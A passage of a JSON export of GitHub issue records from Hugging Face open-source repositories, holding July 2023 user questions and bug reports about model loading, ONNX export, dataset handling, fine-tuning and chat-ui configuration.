run_until_complete\r\n return future.result()\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/server.py\", line 136, in serve_inner\r\n model = get_model(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/models/__init__.py\", line 195, in get_model\r\n return CausalLM(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/models/causal_lm.py\", line 477, in __init__\r\n model = AutoModelForCausalLM.from_pretrained(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/site-packages/transformers/models/auto/auto_factory.py\", line 467, in from_pretrained\r\n return model_class.from_pretrained(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/site-packages/transformers/modeling_utils.py\", line 2387, in from_pretrained\r\n raise EnvironmentError(\r\n\r\nOSError: Error no file named pytorch_model.bin, tf_model.h5, model.ckpt.index or flax_model.msgpack found in directory Ziya-LLaMA-13B_4bit.\r\n rank=0\r\n2023-07-20T08:34:02.453608Z ERROR text_generation_launcher: Shard 0 failed to start\r\n2023-07-20T08:34:02.453654Z INFO text_generation_launcher: Shutting down shards", "url": "https://github.com/huggingface/text-generation-inference/issues/658", "state": "closed", "labels": [], "created_at": "2023-07-20T08:42:57Z", "updated_at": "2023-07-31T23:50:55Z", "user": "Minami-su" }, { "repo": "huggingface/chat-ui", "number": 358, "title": "Broken encoding for Korean and possibly other languages", "body": "I was testing the llama2 and noticed there are some encoding errors (Ignore that the output is total nonsense):\r\n\"image\"\r\nI though It could be because of weird mid-unicode tokenization but I also noticed this on a custom demo using huggingchat ui:\r\n\r\nIt renders correctly & strangely enough breaks and unbreaks 
randomly.\r\n\r\nhttps://github.com/huggingface/chat-ui/assets/15624271/7b7e97cb-876d-47cc-b89d-aabebb9197cf\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/358", "state": "closed", "labels": [ "question", "models" ], "created_at": "2023-07-20T05:00:03Z", "updated_at": "2023-09-11T09:34:12Z", "user": "cceyda" }, { "repo": "huggingface/diffusers", "number": 4160, "title": "How to use diffusers force zeros?", "body": "it seems that it only has effect if its used on instance of diffusers class before model is loaded,\r\nbut i only get instance when i call from_pretrained or from_single_file\r\n", "url": "https://github.com/huggingface/diffusers/issues/4160", "state": "closed", "labels": [ "stale", "SD.Next" ], "created_at": "2023-07-19T22:36:38Z", "updated_at": "2023-09-01T13:09:28Z", "user": "patrickvonplaten" }, { "repo": "huggingface/transformers.js", "number": 200, "title": "[Question] Translation models", "body": "\r\n@xenova is there a model that do the text translation that have lighter weight i mean with minimum size?", "url": "https://github.com/huggingface/transformers.js/issues/200", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-19T22:07:37Z", "updated_at": "2023-07-27T00:17:24Z", "user": "jedLahrim" }, { "repo": "huggingface/dataset-viewer", "number": 1532, "title": "provide one \"partial\" field per entry in aggregated responses", "body": "For example, https://datasets-server.huggingface.co/size?dataset=c4 only provides a global `partial: true` field and the response does not explicit that the \"train\" split is partial, while the \"test\" one is complete.\r\n\r\nEvery entry in `configs` and `splits` should also include its own `partial` field, to be able to show this information in the viewer (selects)\r\n\r\n- currently:\r\n \"Capture\r\n- ideally, something like:\r\n \"Capture\r\n\r\nEndpoints where we want these extra fields:\r\n\r\n- /info, dataset-level\r\n- /size, dataset-level\r\n- /size, config-level\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/1532", "state": "open", "labels": [ "question", "feature request", "P2" ], "created_at": "2023-07-19T20:01:58Z", "updated_at": "2024-05-16T09:36:20Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6053, "title": "Change package name from \"datasets\" to something less generic", "body": "### Feature request\r\n\r\nI'm repeatedly finding myself in situations where I want to have a package called `datasets.py` or `evaluate.py` in my code and can't because those names are being taken up by Huggingface packages. 
While I can understand how (even from the user's perspective) it's aesthetically pleasing to have nice terse library names, ultimately a library hogging simple names like this is something I find short-sighted, impractical and, at my most irritable, frankly rude.\r\n\r\nMy preference would be a pattern like what you get with all the other big libraries like numpy or pandas:\r\n\r\n```\r\nimport huggingface as hf\r\n# hf.transformers, hf.datasets, hf.evaluate\r\n```\r\n\r\nor things like\r\n\r\n```\r\nimport huggingface.transformers as tf\r\n# tf.load_model(), etc\r\n```\r\n\r\nIf this isn't possible for some technical reason, at least call the packages something like `hf_transformers` and so on.\r\n\r\nI realize this is a very big change that has probably been discussed internally already, but I'm opening this issue and sister issues on each huggingface project just to start the conversation and begin tracking community feeling on the matter, since I suspect I'm not the only one who feels like this.\r\n\r\nSorry if this has been requested already on this issue tracker; I couldn't find anything searching for terms like \"package name\".\r\n\r\nSister issues:\r\n- [transformers](https://github.com/huggingface/transformers/issues/24934)\r\n- **datasets**\r\n- [evaluate](https://github.com/huggingface/evaluate/issues/476)\r\n\r\n### Motivation\r\n\r\nNot taking up package names the user is likely to want to use.\r\n\r\n### Your contribution\r\n\r\nNo - more a matter of internal discussion among core library authors.", "url": "https://github.com/huggingface/datasets/issues/6053", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-07-19T19:53:28Z", "updated_at": "2024-11-20T21:22:36Z", "comments": 2, "user": "jack-jjm" }, { "repo": "huggingface/trl", "number": 542, "title": "Supervised Finetuning - How to mask loss for prompts", "body": "How can I mask the loss in supervised fine-tuning for prompts, similar to how it is done in the LLAMA-2 paper?\r\n\r\nSpecifically, I have a dataset of prompts and ideal answers. When fine-tuning my model with a `SFTTrainer` using a `ConstantLengthDataset` (similar to the StackExchange example), how can I ensure that prompts are not considered in the loss?", "url": "https://github.com/huggingface/trl/issues/542", "state": "closed", "labels": [], "created_at": "2023-07-19T14:55:17Z", "updated_at": "2023-08-16T15:02:50Z", "user": "jvhoffbauer" }, { "repo": "huggingface/chat-ui", "number": 351, "title": "Starchat-beta doesn't stop generating text properly", "body": "Hi, I am deploying starchat-beta and chat-ui locally. Strangely, the chat generates some useful text at the beginning, but then it does not stop and goes on to produce unrelated text, like below:\r\n![Screenshot from 2023-07-19 22-23-00](https://github.com/huggingface/chat-ui/assets/7758217/a41395b1-fbe1-4632-b162-35d656ba30a0)\r\n\r\nIs this related to the .env.local configuration?\r\n![Screenshot from 2023-07-19 22-25-01](https://github.com/huggingface/chat-ui/assets/7758217/bda3a91e-e5ce-4b7e-8b6c-e63d129dce37)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/351", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-07-19T14:32:59Z", "updated_at": "2023-07-20T06:29:09Z", "comments": 3, "user": "XiaPZ" }, { "repo": "huggingface/trl", "number": 534, "title": "How to load a trained model to continue training?", "body": "Dear TRL team,\r\n\r\nI face a challenge in that I can't finish the training in one go.
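A minimal sketch of one way to pick up where an interrupted run left off, assuming checkpoints were written during the first run: it relies on the `resume_from_checkpoint` support of the underlying `transformers` `Trainer`, which TRL's trainers build on. The base model name, output directory, and `train_dataset` below are placeholders.

```python
from transformers import (
    AutoModelForSequenceClassification,
    Trainer,
    TrainingArguments,
)

model = AutoModelForSequenceClassification.from_pretrained(
    "meta-llama/Llama-2-7b-hf",  # placeholder base model
    num_labels=1,
)
args = TrainingArguments(
    output_dir="reward_model_ckpts",  # placeholder; holds checkpoint-* dirs
    save_strategy="steps",
    save_steps=500,
)
# train_dataset is a placeholder for your tokenized dataset.
trainer = Trainer(model=model, args=args, train_dataset=train_dataset)
# Restores model weights, optimizer, scheduler, and step count from the
# latest checkpoint found in output_dir, then continues training.
trainer.train(resume_from_checkpoint=True)
```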
Thus, I need to load the model that was trained halfway and continue the training process. Could you please guide me on how to load the half-trained model and continue training?\r\n\r\nBest", "url": "https://github.com/huggingface/trl/issues/534", "state": "closed", "labels": [], "created_at": "2023-07-19T04:36:15Z", "updated_at": "2023-08-26T15:04:58Z", "user": "zyzisastudyreallyhardguy" }, { "repo": "huggingface/diffusers", "number": 4150, "title": "How to train text-to-image model based on SDXL?", "body": "Can I use the train_text_to_image.py code directly?", "url": "https://github.com/huggingface/diffusers/issues/4150", "state": "closed", "labels": [], "created_at": "2023-07-19T02:59:00Z", "updated_at": "2023-07-21T15:23:30Z", "user": "EnzoWuu" }, { "repo": "huggingface/text-generation-inference", "number": 636, "title": "How to config vllm gpu_memory_utilization?", "body": "Hi team, I am trying to use the codegen2.5 7b model on TGI with an A100 40GB, and it gives me an out-of-memory error because of vLLM. I wonder if there is any way I can configure gpu_memory_utilization in the code so that vLLM does not reserve too much memory beforehand.", "url": "https://github.com/huggingface/text-generation-inference/issues/636", "state": "closed", "labels": [], "created_at": "2023-07-18T20:19:28Z", "updated_at": "2024-07-04T07:32:01Z", "user": "zch-cc" }, { "repo": "huggingface/optimum", "number": 1202, "title": "What is the process for contributing a new backend?", "body": "### Feature request\r\n\r\nIn terms of contributing a new backend/optimizer to Optimum as an optional extension, what is the process?\r\n\r\nI have been working on an Optimum integration with [DeepSparse](https://github.com/neuralmagic/deepsparse), Neural Magic's inference runtime for sparse execution on CPUs. Given that it is an open-source contribution that we've already started and will continue to support, is it mostly just a matter of creating a `huggingface/optimum-deepsparse` repo to push up the state?\r\n\r\n### Motivation\r\n\r\nWe already have a project hosted by Neural Magic: https://github.com/neuralmagic/optimum-deepsparse\r\n\r\nIt is already functional for a few simple tasks (image/text/audio/token classification, question answering, masked lm) and is generally aiming for usability parity with ORTModel, since DeepSparse also takes in ONNX models directly for compilation.\r\nDeepSparse supports x86 and ARM CPUs, and is able to see performance benefits from unstructured sparsity on all platforms.\r\nHaving optimum-deepsparse be officially installable through the Optimum base as an extension, i.e. `pip install optimum[deepsparse]`, would be important for writing clean flows for people to sparsify their models and get the maximal inference performance out of their CPUs.\r\n\r\n### Your contribution\r\n\r\nhttps://github.com/neuralmagic/optimum-deepsparse\r\nI'm happy to submit a PR to add it to Optimum's setup.py, write documentation detailing how to use it, and anything else required to make an official request.
Thank you!", "url": "https://github.com/huggingface/optimum/issues/1202", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2023-07-18T18:07:14Z", "updated_at": "2025-05-13T02:14:09Z", "user": "mgoin" }, { "repo": "huggingface/accelerate", "number": 1743, "title": "what is the possible reason for accelerate running on cuda 12.2 8xA100 with error accelerate multiprocessing.api:failed (exitcode: -9)", "body": "### System Info\n\n```Shell\nubuntu 22.04\r\ngpu A100 80G\r\ncuda version 12.2\r\naccelerate version 0.21.0\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nrunning the demo script from diffusers [train_text_to_image.py](https://github.com/huggingface/diffusers/tree/main/examples/text_to_image) for 100k iterations with batch size 8 each gpu, 8 A100 gpus in total\n\n### Expected behavior\n\nsuccessful training without any problem", "url": "https://github.com/huggingface/accelerate/issues/1743", "state": "closed", "labels": [], "created_at": "2023-07-18T13:33:35Z", "updated_at": "2023-08-15T09:18:05Z", "user": "garychan22" }, { "repo": "huggingface/datasets", "number": 6048, "title": "when i use datasets.load_dataset, i encounter the http connect error!", "body": "### Describe the bug\n\n`common_voice_test = load_dataset(\"audiofolder\", data_dir=\"./dataset/\",cache_dir=\"./cache\",split=datasets.Split.TEST)`\r\nwhen i run the code above, i got the error as below:\r\n--------------------------------------------\r\nConnectionError: Couldn't reach https://raw.githubusercontent.com/huggingface/datasets/2.3.2/datasets/audiofolder/audiofolder.py (ConnectionError(MaxRetryError(\"HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /huggingface/datasets/2.3.2/datasets/audiofolder/audiofolder.py (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 101] Network is unreachable'))\")))\r\n\r\n\r\n--------------------------------------------------\r\nMy all data is on local machine, why does it need to connect the internet? how can i fix it, because my machine cannot connect the internet.\n\n### Steps to reproduce the bug\n\n1\n\n### Expected behavior\n\nno error when i use the load_dataset func\n\n### Environment info\n\npython=3.8.15", "url": "https://github.com/huggingface/datasets/issues/6048", "state": "closed", "labels": [], "created_at": "2023-07-18T10:16:34Z", "updated_at": "2023-07-18T16:18:39Z", "comments": 1, "user": "yangy1992" }, { "repo": "huggingface/safetensors", "number": 299, "title": "Any plan to support Nvidia GPUDirect Storage?", "body": "### Feature request\n\nNvidia GPUDirect Storage has better performance to load model from NVMe disk or supported distributed storage. 
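For context on the current non-GDS path: `safetensors` already memory-maps the file and can materialize tensors directly onto a CUDA device, which avoids a staging pass through Python-level CPU copies. A minimal sketch, with a placeholder file path:

```python
from safetensors.torch import load_file

# "model.safetensors" is a placeholder path; device= places the tensors
# on the GPU as they are read from the memory-mapped file.
state_dict = load_file("model.safetensors", device="cuda:0")
print({name: tuple(t.shape) for name, t in list(state_dict.items())[:3]})
```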
It will do the real `zero copy`.\n\n### Motivation\n\nIt will get better performance with Nvidia GDS.\n\n### Your contribution\n\nNot sure.", "url": "https://github.com/huggingface/safetensors/issues/299", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-17T06:36:51Z", "updated_at": "2025-11-22T05:21:50Z", "comments": 9, "user": "carmark" }, { "repo": "huggingface/optimum", "number": 1191, "title": "ONNX Generation - Support for Donut", "body": "### Feature request\r\n\r\nI have been trying to convert my custom Donut model to ONNX by using this specific command:\r\n!python3 -m optimum.exporters.onnx --model={custom_model_id} --task=vision2seq-lm ./models/onnx --optimize O4 --atol 1e-2 --opset=13\r\n\r\nThe following exception occurs at the end of the process, by which I understand the vision-encoder-decoder is not supported yet. Are there any plans to integrate vision-encoder-decoder for optimum.exporters.onnx soon?\r\n\r\nError observed:\r\n\r\nFile \"/usr/local/lib/python3.10/dist-packages/optimum/onnxruntime/utils.py\", line 162, in check_optimization_supported_model\r\n raise NotImplementedError(\r\nNotImplementedError: ONNX Runtime doesn't support the graph optimization of vision-encoder-decoder yet. Only ['albert', 'bart', 'bert', 'big_bird', 'blenderbot', 'bloom', 'camembert', 'codegen', 'deberta', 'deberta-v2', 'distilbert', 'electra', 'gpt2', 'gpt_neo', 'gpt_neox', 'gptj', 'longt5', 'llama', 'marian', 'mbart', 'mt5', 'm2m_100', 'nystromformer', 'pegasus', 'roberta', 't5', 'vit', 'whisper', 'xlm-roberta'] are supported. If you want to support vision-encoder-decoder please propose a PR or open up an issue in ONNX Runtime: https://github.com/microsoft/onnxruntime.\r\n\r\n\r\n\r\n### Motivation\r\n\r\nUse optimum.exporters.onnx to convert custom Donut model to ONNX to improve inference performance.\r\n\r\n### Your contribution\r\n\r\nStill looking at the links and getting familiar how to proceed with change. will be grateful if someone can point me to resources where I can get started. thanks.", "url": "https://github.com/huggingface/optimum/issues/1191", "state": "closed", "labels": [ "feature-request", "onnx" ], "created_at": "2023-07-16T13:38:38Z", "updated_at": "2024-10-15T16:14:33Z", "comments": 3, "user": "ghost" }, { "repo": "huggingface/transformers.js", "number": 194, "title": "[Question] Transformers.js bundle size", "body": "I'm building a small project that runs `transformers.js` in a `Worker` to do client side embedding.\r\nI noticed that including `import { pipeline } from '@xenova/transformers';` immediately increases my bundle size to over **3MB**. 
\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/3016806/f4a0f8bb-9d6f-4f92-a39c-ee3be4cc4198)\r\nCreated using [webpack-bundle-analyzer](https://www.npmjs.com/package/webpack-bundle-analyzer)\r\n\r\nOptimizing for this It's probably a large effort, but I was wondering if you have any ideas on how this could be optimized.", "url": "https://github.com/huggingface/transformers.js/issues/194", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-16T08:06:28Z", "updated_at": "2023-07-16T16:28:52Z", "user": "lizozom" }, { "repo": "huggingface/trl", "number": 520, "title": "how to change the cache directory when using AutoModelForCausalLMWithValueHead.from_pretrained()", "body": "I have tried several methods, but it still download to my home directory", "url": "https://github.com/huggingface/trl/issues/520", "state": "closed", "labels": [], "created_at": "2023-07-16T04:21:45Z", "updated_at": "2023-07-17T08:11:02Z", "user": "zyzisastudyreallyhardguy" }, { "repo": "huggingface/peft", "number": 711, "title": "How to change the location of soft tokens in prompt tuning", "body": "### Feature request\n\nIn fact, when prompt tuning, we will not always add it to the front, it may be in the middle. So I think it's important for us to change the location of soft tokens.\n\n### Motivation\n\nIn fact, when prompt tuning, we will not always add it to the front, it may be in the middle. So I think it's important for us to change the location of soft tokens.\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/peft/issues/711", "state": "closed", "labels": [], "created_at": "2023-07-15T13:57:52Z", "updated_at": "2024-04-09T06:39:55Z", "user": "XueTianci" }, { "repo": "huggingface/datasets", "number": 6038, "title": " File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 992, in _download_and_prepare if str(split_generator.split_info.name).lower() == \"all\": AttributeError: 'str' object has no attribute 'split_info'. 
Did you mean: 'splitlines'?", "body": "Hi, I use the code below to load local file\r\n```\r\n def _split_generators(self, dl_manager):\r\n # TODO: This method is tasked with downloading/extracting the data and defining the splits depending on the configuration\r\n # If several configurations are possible (listed in BUILDER_CONFIGS), the configuration selected by the user is in self.config.name\r\n\r\n # dl_manager is a datasets.download.DownloadManager that can be used to download and extract URLS\r\n # It can accept any type or nested list/dict and will give back the same structure with the url replaced with path to local files.\r\n # By default the archives will be extracted and a path to a cached folder where they are extracted is returned instead of the archive\r\n # urls = _URLS[self.config.name]\r\n data_dir = dl_manager.download_and_extract(_URLs)\r\n print(data_dir)\r\n return [\r\n datasets.SplitGenerator(\r\n name=datasets.Split.TRAIN,\r\n # These kwargs will be passed to _generate_examples\r\n gen_kwargs={\r\n \"filepath\": os.path.join(data_dir[\"train\"]),\r\n \"split\": \"train\",\r\n },\r\n ),\r\n datasets.SplitGenerator(\r\n name=datasets.Split.VALIDATION,\r\n # These kwargs will be passed to _generate_examples\r\n gen_kwargs={\r\n \"filepath\": os.path.join(data_dir[\"dev\"]),\r\n \"split\": \"dev\",\r\n },\r\n ),\r\n ]\r\n```\r\nand error occured\r\n```\r\n\r\nTraceback (most recent call last):\r\n File \"/home/zhizhou/data1/zhanghao/huggingface/FineTuning_Transformer/load_local_dataset.py\", line 2, in \r\n dataset = load_dataset(\"./QA_script.py\",data_files='/home/zhizhou/.cache/huggingface/datasets/conversatiom_corps/part_file.json')\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/load.py\", line 1809, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 909, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 1670, in _download_and_prepare\r\n super()._download_and_prepare(\r\n File \"/home/zhizhou/anaconda3/envs/pytorch/lib/python3.10/site-packages/datasets/builder.py\", line 992, in _download_and_prepare\r\n if str(split_generator.split_info.name).lower() == \"all\":\r\nAttributeError: 'str' object has no attribute 'split_info'. 
Did you mean: 'splitlines'?\r\n```\r\nCould you help me?", "url": "https://github.com/huggingface/datasets/issues/6038", "state": "closed", "labels": [], "created_at": "2023-07-15T07:58:08Z", "updated_at": "2023-07-24T11:54:15Z", "comments": 1, "user": "BaiMeiyingxue" }, { "repo": "huggingface/datasets", "number": 6033, "title": "`map` function doesn't fully utilize `input_columns`.", "body": "### Describe the bug\r\n\r\nI wanted to select only some columns of data.\r\nAnd I thought that's why the argument `input_columns` exists.\r\nWhat I expected is like this:\r\nIf there are [\"a\", \"b\", \"c\", \"d\"] columns, and if I set `input_columns=[\"a\", \"d\"]`, the data will have only [\"a\", \"d\"] columns.\r\n\r\nBut it doesn't select columns.\r\nIt preserves existing columns.\r\nThe main cause is the `update` function of the `dict`-type `transformed_batch`.\r\n\r\nhttps://github.com/huggingface/datasets/blob/682d21e94ab1e64c11b583de39dc4c93f0101c5a/src/datasets/iterable_dataset.py#L687-L691\r\n\r\n`transformed_batch` gets all the columns by `transformed_batch = dict(batch)`.\r\nEven though `function_args` selects `input_columns`, `update` preserves columns other than `input_columns`.\r\nI think it should take a new dictionary with columns in `input_columns` like this:\r\n```\r\n# transformed_batch = dict(batch)\r\n# transformed_batch.update(self.function(*function_args, **self.fn_kwargs))\r\n\r\n# This is what I think is correct.\r\ntransformed_batch = self.function(*function_args, **self.fn_kwargs)\r\n```\r\n\r\nLet me know how to use `input_columns`.\r\n\r\n### Steps to reproduce the bug\r\n\r\nDescribed above.\r\n\r\n### Expected behavior\r\n\r\nDescribed above.\r\n\r\n### Environment info\r\n\r\ndatasets: 2.12\r\npython: 3.8", "url": "https://github.com/huggingface/datasets/issues/6033", "state": "closed", "labels": [], "created_at": "2023-07-14T08:49:28Z", "updated_at": "2023-07-14T09:16:04Z", "comments": 0, "user": "kwonmha" }, { "repo": "huggingface/text-generation-inference", "number": 614, "title": "How to make it? How can we extend the 'max_new_tokens' from 1512 to either 4096 or 8192?", "body": "### System Info\n\n How can we extend the 'max_new_tokens' from 1512 to either 4096 or 8192?\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [X] My own modifications\n\n### Reproduction\n\n'max_new_tokens' from 1512 to either 4096 or 8192\n\n### Expected behavior\n\n'max_new_tokens' from 1512 to either 4096 or 8192", "url": "https://github.com/huggingface/text-generation-inference/issues/614", "state": "closed", "labels": [], "created_at": "2023-07-14T08:46:29Z", "updated_at": "2023-07-19T06:04:32Z", "user": "DiamondYuanqi" }, { "repo": "huggingface/transformers.js", "number": 193, "title": "all-MiniLM-L6-v2 vector lengths", "body": "Hey, is there any way to programmatically fix the vector embedding array lengths to a certain length? 
I was using https://huggingface.co/Xenova/all-MiniLM-L6-v2 with Node.js, and every input I ran through the pipe gave a different length; it would be nice to be able to keep it consistent.\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/193", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-13T20:31:06Z", "updated_at": "2023-07-13T22:32:03Z", "user": "unkn-wn" }, { "repo": "huggingface/chat-ui", "number": 344, "title": "404 not found error when exporting data", "body": "https://github.com/huggingface/chat-ui/blob/1eff97d9fd47d8c486480d4d9a5208437c519cbb/src/routes/admin/export/%2Bserver.ts#L16\r\n\r\nI am using the main branch and tried to export the dataset with the curl request given in the code, but the server returns 404 not found.\r\nIt's behind a reverse proxy with SSL; do I need to call localhost, or should it be possible even from outside the network?", "url": "https://github.com/huggingface/chat-ui/issues/344", "state": "closed", "labels": [ "question", "back" ], "created_at": "2023-07-13T08:40:27Z", "updated_at": "2023-11-10T09:50:22Z", "user": "flozi00" }, { "repo": "huggingface/sentence-transformers", "number": 2254, "title": "How to prepare label for the dataset that has two pairs of text, but not labels?", "body": "Hi,\r\n\r\nThank you for the great information; I have a question. My data has two columns of text: one is the description of a request, and the other is an answer to that request. I want to use ContrastiveLoss to make the request-answer pairs close and the unrelated answers far apart, but I do not know how to provide the labels for my positive and negative pairs, because the dataset function accepts triples like these when calling InputExample:\r\n\r\n(a1,b1,1) (a1,bi,0)\r\n\r\nI appreciate your help.", "url": "https://github.com/huggingface/sentence-transformers/issues/2254", "state": "open", "labels": [], "created_at": "2023-07-12T21:30:07Z", "updated_at": "2023-07-30T15:38:09Z", "user": "Yarmohamadshr" }, { "repo": "huggingface/optimum", "number": 1183, "title": "Cannot convert owlvit-base-patch32 model to ONNX and run inference", "body": "### System Info\n\n```shell\nOptimum version: 1.9.1\r\nPython version: 3.11.3\r\nOS: MacOS\n```\n\n\n### Who can help?\n\n@mich\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using the CLI command\r\n`optimum-cli export onnx --model google/owlvit-base-patch32 --task zero-shot-object-detection object_detection/owlvit_onnx` \r\nI'm able to get a converted ONNX model. 
Then, when using the following code to perform inference with the converted model:\r\n```python\r\nimport numpy as np\r\nimport onnxruntime as ort\r\nimport skimage\r\nfrom PIL import Image\r\nfrom transformers import AutoProcessor\r\n\r\ncheckpoint = \"google/owlvit-base-patch32\"\r\nprocessor = AutoProcessor.from_pretrained(checkpoint)\r\n\r\nimage = skimage.data.astronaut()\r\nimage = Image.fromarray(np.uint8(image)).convert(\"RGB\")\r\ntext_queries = [\"human face\", \"rocket\", \"nasa badge\", \"star-spangled banner\", \"woman\", \"smile\", \"hair\", \"human head\", \"human eye\"]\r\n\r\nnp_inputs = processor(text=text_queries, images=image, return_tensors=\"np\")\r\nsession = ort.InferenceSession(\"object_detection/owlvit_onnx/model.onnx\")\r\n\r\nout = session.run([\"logits\", \"pred_boxes\", \"text_embeds\", \"image_embeds\"], np_inputs)\r\n```\r\n\r\nI get the following error: \r\n`RuntimeException: [ONNXRuntimeError] : 6 : RUNTIME_EXCEPTION : Non-zero status code returned while running Reshape node. Name:'/Reshape_3' Status Message: /Users/runner/work/1/s/onnxruntime/core/providers/cpu/tensor/reshape_helper.h:41 onnxruntime::ReshapeHelper::ReshapeHelper(const onnxruntime::TensorShape &, onnxruntime::TensorShapeVector &, bool) gsl::narrow_cast(input_shape.Size()) == size was false. The input tensor cannot be reshaped to the requested shape. Input shape:{9,16}, requested shape:{2,4,16}`\r\n\r\nNow, it seems to be related to some input being wrong, but I cannot figure out what. The pre-processing step is the same as for the HF model; the only difference is that instead of returning \"pt\" tensors I'm returning \"np\" so it can work with ONNX. Here are my input shapes:\r\n\r\ninput_ids: (9, 16)\r\nattention_mask: (9, 16)\r\npixel_values: (1, 3, 768, 768)\r\n\r\nThanks in advance!\n\n### Expected behavior\n\nInference to run successfully and outputs to be very similar to that of the original torch model. 
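In case it helps with debugging, here is how I checked which input dimensions the exported graph actually treats as dynamic. My suspicion (just a guess) is that the text batch dimension was fixed at export time, since the requested shape {2,4,16} looks like 2 images times 4 queries from the export's dummy inputs:

```python
import onnxruntime as ort

# List the graph's declared inputs: symbolic dimension names indicate dynamic
# axes, while plain integers were baked in when the model was exported.
session = ort.InferenceSession("object_detection/owlvit_onnx/model.onnx")
for inp in session.get_inputs():
    print(inp.name, inp.shape)
```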
", "url": "https://github.com/huggingface/optimum/issues/1183", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-12T13:20:12Z", "updated_at": "2024-07-27T14:27:58Z", "comments": 9, "user": "Pedrohgv" }, { "repo": "huggingface/chat-ui", "number": 341, "title": "SSL Wrong version number error", "body": "i have added this\r\n\"endpoints\": [\r\n {\"url\": \"http://127.0.0.1:8080/generate_stream\", \"weight\": 100}\r\n ],\r\n\r\nin the model but i am getting this error\r\n\r\nTypeError: fetch failed\r\n at fetch (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/undici/index.js:109:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/node_modules/@sveltejs/kit/src/runtime/server/fetch.js:32:10)\r\n at async POST (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/src/routes/conversation/[id]/+server.ts:91:16)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22 {\r\n cause: [Error: C0770BE8547F0000:error:0A00010B:SSL routines:ssl3_get_record:wrong version number:../deps/openssl/openssl/ssl/record/ssl3_record.c:355:\r\n ] {\r\n library: 'SSL routines',\r\n reason: 'wrong version number',\r\n code: 'ERR_SSL_WRONG_VERSION_NUMBER'\r\n }\r\n}\r\nError: aborted\r\n at connResetException (node:internal/errors:717:14)\r\n at abortIncoming (node:_http_server:754:17)\r\n at socketOnClose (node:_http_server:748:3)\r\n at Socket.emit (node:events:525:35)\r\n at TCP. 
(node:net:322:12) {\r\n code: 'ECONNRESET'\r\n}", "url": "https://github.com/huggingface/chat-ui/issues/341", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-12T04:40:58Z", "updated_at": "2023-09-18T14:00:27Z", "comments": 4, "user": "swikrit21" }, { "repo": "huggingface/diffusers", "number": 4054, "title": "[SD-XL] How to apply invisible-watermark for latent output", "body": "### Describe the bug\n\nAs a part of the license with SAI, we need to ensure the invisible watermark is applied across all images output by these models, including the Img2Img pipeline.\n\n### Reproduction\n\n```py\r\n # if xformers or torch_2_0 is used attention block does not need\r\n # to be in float32 which can save lots of memory\r\n if use_torch_2_0_or_xformers:\r\n self.vae.post_quant_conv.to(latents.dtype)\r\n self.vae.decoder.conv_in.to(latents.dtype)\r\n self.vae.decoder.mid_block.to(latents.dtype)\r\n else:\r\n latents = latents.float()\r\n if not output_type == \"latent\":\r\n image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]\r\n else:\r\n image = latents\r\n return StableDiffusionXLPipelineOutput(images=image)\r\n```\r\n\r\nthe relevant portion of the img2img pipeline code.\r\n\r\nin the XL pipeline, the latent output mode does not have the watermark applied - so, it is easily bypassed.\n\n### Logs\n\n```shell\nN/A\n```\n\n\n### System Info\n\nGit main branch.\n\n### Who can help?\n\ncc: @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/4054", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-12T03:58:04Z", "updated_at": "2023-07-12T10:21:29Z", "user": "bghira" }, { "repo": "huggingface/transformers.js", "number": 192, "title": "Table Question Answering Support?", "body": "Hi - Interested in support for table question answering models. 
